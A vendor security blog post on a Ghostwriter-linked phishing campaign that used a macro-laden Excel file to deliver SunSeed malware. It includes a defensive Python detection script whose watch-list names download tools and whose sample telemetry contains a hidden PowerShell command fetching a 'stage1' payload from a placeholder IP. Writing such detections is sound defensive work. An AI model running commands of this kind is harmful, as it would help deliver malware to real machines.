BlackBerry ThreatVector Blog

BlackBerry Prevents SunSeed Malware

CYBERSECURITY / 04.07.22 / Hector Diaz

The saying, “With chaos comes opportunity,” applies whether one is seeking to do good—or bad. The latter was evidenced by a recent phishing campaign put forth by a threat group seeking to take advantage of the turmoil in Ukraine to prey on European government personnel as they were assisting refugees.

Researchers discovered the attacker’s tactics resemble those of Ghostwriter—also known as TA445 or UNC1151, which was previously identified as working in the interests of Belarus. In this attack, the threat group used an email originating from a UKR[.]net address to formulate a new email containing a malicious Excel® document, then sent the weaponized message to a European government entity. UKR[.]net is a popular Ukrainian ISP and provider of personal email accounts. The email had the following subject line: “IN ACCORDANCE WITH THE DECISION OF THE EMERGENCY MEETING OF THE SECURITY COUNCIL OF UKRAINE DATED 24.02.2022.” Once a user opened the official-looking email and Excel file, the macro would install SunSeed malware onto the victim’s system.
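The delivery chain described above (an official-looking Excel attachment whose macro acts as a downloader) leaves a recognisable trace in endpoint telemetry: an Office host process spawning a script interpreter or download-capable utility. The following Python is an added example, not BlackBerry's code and not a description of SunSeed's actual macro; it runs a simple detection over constructed Sysmon-style process-creation events in an assumed key=value format. The field names, the list of suspect child processes and the sample events (including the 203.0.113.10 documentation-range address) are all assumptions, not data from the post.

```python
"""
Added example: flag the "Office macro as downloader" pattern in
process-creation events. Not BlackBerry's code; the event format, field
names and process lists are assumptions for illustration.
"""
import re
from dataclasses import dataclass

# Office applications that host macro-enabled documents (assumed list).
OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Child processes a macro downloader commonly uses to fetch or launch a
# payload (assumed list; tune to what is normal in your environment).
SUSPECT_CHILDREN = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "certutil.exe", "bitsadmin.exe", "curl.exe", "rundll32.exe",
    "regsvr32.exe", "msiexec.exe",
}

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# key=value pairs, with optional double-quoted values (assumed log format)
KV_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')


@dataclass
class ProcessEvent:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one key=value event line into a ProcessEvent."""
    fields = {}
    for m in KV_RE.finditer(line):
        # group(3) is the unquoted inner text of a quoted value
        value = m.group(3) if m.group(3) is not None else m.group(2)
        fields[m.group(1)] = value
    return ProcessEvent(
        timestamp=fields["ts"],
        host=fields["host"],
        parent_image=fields["parent"],
        image=fields["image"],
        command_line=fields.get("cmd", ""),
    )


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def assess(event: ProcessEvent) -> list:
    """Return indicator strings for one event; empty list means no match."""
    indicators = []
    parent = basename(event.parent_image)
    child = basename(event.image)
    if parent in OFFICE_HOSTS and child in SUSPECT_CHILDREN:
        indicators.append(f"office host {parent} spawned {child}")
        # A URL on the child's command line points at the download stage.
        if URL_RE.search(event.command_line):
            indicators.append("child command line carries a URL")
    return indicators


def scan(lines) -> list:
    """Run assess() over event lines and collect the matching ones."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_event(line)
        hits = assess(ev)
        if hits:
            findings.append({
                "timestamp": ev.timestamp,
                "host": ev.host,
                "parent": basename(ev.parent_image),
                "child": basename(ev.image),
                "indicators": hits,
            })
    return findings


# Constructed sample telemetry: one Excel-to-PowerShell chain with a URL,
# a benign Excel launch, a benign cmd.exe, and a Word-to-wscript chain.
SAMPLE_EVENTS = r"""
ts=2022-03-01T10:15:02Z host=WS-FIN-07 parent="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cmd="powershell.exe -w hidden -f C:\Users\jdoe\AppData\Local\Temp\s.ps1 http://203.0.113.10/stage1"
ts=2022-03-01T10:15:04Z host=WS-FIN-07 parent="C:\Windows\explorer.exe" image="C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" cmd="EXCEL.EXE C:\Users\jdoe\Downloads\decision.xls"
ts=2022-03-01T10:16:30Z host=WS-HR-02 parent="C:\Windows\explorer.exe" image="C:\Windows\System32\cmd.exe" cmd="cmd.exe /c dir"
ts=2022-03-01T10:17:11Z host=WS-OPS-11 parent="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" image="C:\Windows\System32\wscript.exe" cmd="wscript.exe C:\Users\asmith\AppData\Local\Temp\update.vbs"
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS.splitlines()):
        print(finding)
```

Only two of the four constructed events are flagged: the Excel-to-PowerShell chain (two indicators, because its command line also carries a URL) and the Word-to-wscript chain (one indicator). The benign Excel launch from explorer.exe and the plain cmd.exe are left alone, which is the point of keying on the parent process rather than on the child alone.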

Findings also indicated the “sender’s” email account used in the attack might belong to a member of the Ukrainian military, who may have been a victim of an earlier phishing campaign targeting both civilians and soldiers in Ukraine.

To see how BlackBerry prevents SunSeed malware attacks from occurring, check out the video below.

DEMO VIDEO: BlackBerry vs. SunSeed Malware
 
Learn more about SunSeed Malware in our deep dive blog: Threat Thursday: SunSeed Malware Targets Ukraine Refugee Aid Efforts
 
Figure 1 – In this demonstration, we have an armed document with a malicious macro that serves as a downloader for SunSeed malware
 
Figure 2 – CylancePROTECT® stops the malware before it has an opportunity to cause any damage in the environment
 

Proven Protection Against This Attack

As the video shows, BlackBerry’s AI-driven CylancePROTECT® endpoint protection platform (EPP) provides automated malware prevention, application and script control, memory protection, and device policy enforcement.

BlackBerry Assistance

The BlackBerry Incident Response team can work with organizations of any size and across any vertical industry to evaluate and enhance their endpoint security posture and proactively maintain the security, integrity, and resilience of their network infrastructure.

For emergency assistance, please email us at DLIR@blackberry.com, or use our handraiser form.

 

Video Transcript

In this quick video, we are going to demonstrate how CylancePROTECT® prevents SunSeed malware before it can cause any damage to the environment.

Here we have a sample of an armed document with a malicious macro that serves as a downloader for the SunSeed payload. As soon as we try to execute the malicious macro, our Script Control module intercepts the malicious attempt, successfully preventing SunSeed and terminating associated processes. 

Prevention is Possible with BlackBerry®

About Hector Diaz

Senior Technical Marketing Manager at BlackBerry

Hector Diaz is a Senior Technical Marketing Manager for Latin America and the Caribbean at BlackBerry. Hector works with Engineering and Product Management to translate technology concepts into digestible pieces, evangelizing and educating people about Artificial Intelligence (AI) applied to cybersecurity.

With over 15 years of experience in cybersecurity, Hector is a respected professional who is in demand at trade shows, partner training and customer engagements across Latin America and the Caribbean region.